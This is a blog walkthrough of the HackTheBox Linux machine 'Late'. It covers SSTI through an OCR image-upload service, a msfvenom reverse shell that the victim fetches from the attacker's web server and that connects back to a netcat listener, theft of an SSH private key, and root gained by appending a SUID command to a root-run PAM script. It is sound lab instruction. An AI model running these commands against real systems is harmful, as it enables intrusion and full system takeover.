HackTheBox – Late

Hi everyone! This is a Linux machine challenge that was created on 24 April 2022. This machine requires us to utilize Optical Character Recognition (OCR) in Python for SSTI which gives us initial access. For privilege escalation, we are required to enumerate files in the victim machine owned by the user and modify a script that will be executed by root whenever we SSH into the machine. Let’s get started!

1. Nmap enumeration

$ IP=

$ nmap -sC -sV -p- $IP
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 02:5e:29:0e:a3:af:4e:72:9d:a4:fe:0d:cb:5d:83:07 (RSA)
|   256 41:e1:fe:03:a5:c7:97:c4:d5:16:77:f3:41:0c:e9:fb (ECDSA)
|_  256 28:39:46:98:17:1e:46:1a:1e:a1:ab:3b:9a:57:70:48 (ED25519)
80/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Late - Best online image tools
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.11 seconds

2. Web enumeration

2.1 Domain name discovery

Modify the /etc/hosts file to include the domain name.

$ sudo nano /etc/hosts

Below shows my /etc/hosts new content:       localhost       kali late.htb images.late.htb

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

2.2 images.late.htb

2.3 Testing text-based image upload

As we know based on the website that it will auto parse the text in an uploaded image and return the result to us. Let’s give it a try. I created an image, testing.png, as shown below using Paint on Windows OS with Calibri font and font size 22 before transferring it to my Kali machine to upload.

Once uploaded, the website will let me download the result, results.txt, which indeed contains the same text in the image.

2.4 SSTI vulnerability discovery

I decided to give Server-Side Template Injection (SSTI) a try as shown in ssti_test.png below which turn out to be successful.

I was able to get back the result of 2*6.

2.5 Obtaining the correct font and size

As we know we can use Method Resolution Order (MRO) to obtain a shell, there was an error when I tried to do so. I decided to remove the curly brackets to check the text and noticed that some of the characters like underscores are missing. After a few experiments, Source Code Pro Black font with font size 14 and zoom in image capture using Windows’ snip tool is the best without frequently have any characters parsed incorrectly. This is actually the hardest of this machine which is to make the parsing work. A lot of patience is needed. Keep retrying until it works.

2.6 Reverse shell

Generate reverse shell file:

$ msfvenom -p linux/x64/shell_reverse_tcp LHOST= LPORT=8080 -f elf -o rshell.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 74 bytes
Final size of elf file: 194 bytes
Saved as: rshell.elf

We can now exploit the RCE to get our generated reverse shell file. Remember to start HTTP service on port 80 and a netcat listener on port 8080.


You should get a successful connection from the victim machine.

$ python3 -m http.server 80
Serving HTTP on port 80 ( ... - - [07/Jul/2022 08:50:10] "GET /rshell.elf HTTP/1.1" 200 -

We can now change the permission before executing it.

Finally, our netcat listener should receive a shell.

$ nc -lvnp 8080
listening on [any] 8080 ...
connect to [] from (UNKNOWN) [] 49900
python -c 'import pty; pty.spawn("/bin/bash")'

2.7 Obtain user flag

svc_acc@late:/home/svc_acc/app$ cd ~
cd ~
svc_acc@late:/home/svc_acc$ ls
app  user.txt
svc_acc@late:/home/svc_acc$ cat user.txt
cat user.txt

3. Privilege escalation

3.1 Discovered interesting script

svc_acc@late:/home/svc_acc$ find / -group svc_acc 2>/dev/null

svc_acc@late:/home/svc_acc$ ls -l /usr/local/sbin/ssh-alert.sh
ls -l /usr/local/sbin/ssh-alert.sh
-rwxr-xr-x 1 svc_acc svc_acc 433 Jul  7 13:43 /usr/local/sbin/ssh-alert.sh

svc_acc@late:/home/svc_acc$ cat /usr/local/sbin/ssh-alert.sh
cat /usr/local/sbin/ssh-alert.sh

SUBJECT="Email from Server Login: SSH Alert"

A SSH login was detected.

        User:        $PAM_USER
        User IP Host: $PAM_RHOST
        Service:     $PAM_SERVICE
        TTY:         $PAM_TTY
        Date:        `date`
        Server:      `uname -a`

if [ ${PAM_TYPE} = "open_session" ]; then
        echo "Subject:${SUBJECT} ${BODY}" | /usr/sbin/sendmail ${RECIPIENT}

3.2 Test if the script will be executed as root

Firstly, we will need tools like pspy to monitor the processes. I downloaded pspy into my Kali machine first from Github.

$ wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64

Next, obtain the ssh private key and store it in le_key.txt. Otherwise, once we execute pspy, we will need another reverse shell in the machine which is troublesome.

svc_acc@late:/home/svc_acc$ cat ~/.ssh/id_rsa
cat ~/.ssh/id_rsa

We can now run pspy on the victim’s machine.

svc_acc@late:/home/svc_acc$ chmod +x pspy64

svc_acc@late:/home/svc_acc$ ./pspy64

Connect to the victim’s machine via SSH using the private key, le_key.txt.

$ chmod 600 ./le_key.txt

$ ssh svc_acc@ -i ./le_key.txt

We should see the script is executed as root, UID 0.

Obtain root shell

Since we know the script will be executed as root, we can append a malicious command at the end of the script to make /bin/bash SUID.

svc_acc@late:~$ echo "chmod u+s /bin/bash" >> /usr/local/sbin/ssh-alert.sh

Attempt to SSH in again.

$ ssh svc_acc@ -i ./le_key.txt

/bin/bash should now be set to SUID. We can obtain a root shell using it.

svc_acc@late:~$ bash -p
bash-4.4# id
uid=1000(svc_acc) gid=1000(svc_acc) euid=0(root) groups=1000(svc_acc)

Obtaining root flag

bash-4.4# cd /root
bash-4.4# ls
root.txt  scripts
bash-4.4# cat root.txt

I hope this article has been helpful to you. Feel free to leave any comments below. You may also send me some tips if you like my work and want to see more of such content. Funds will mostly be used for my boba milk tea addiction. The link is here. 🙂


Leave a Reply

Please log in using one of these methods to post your comment:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.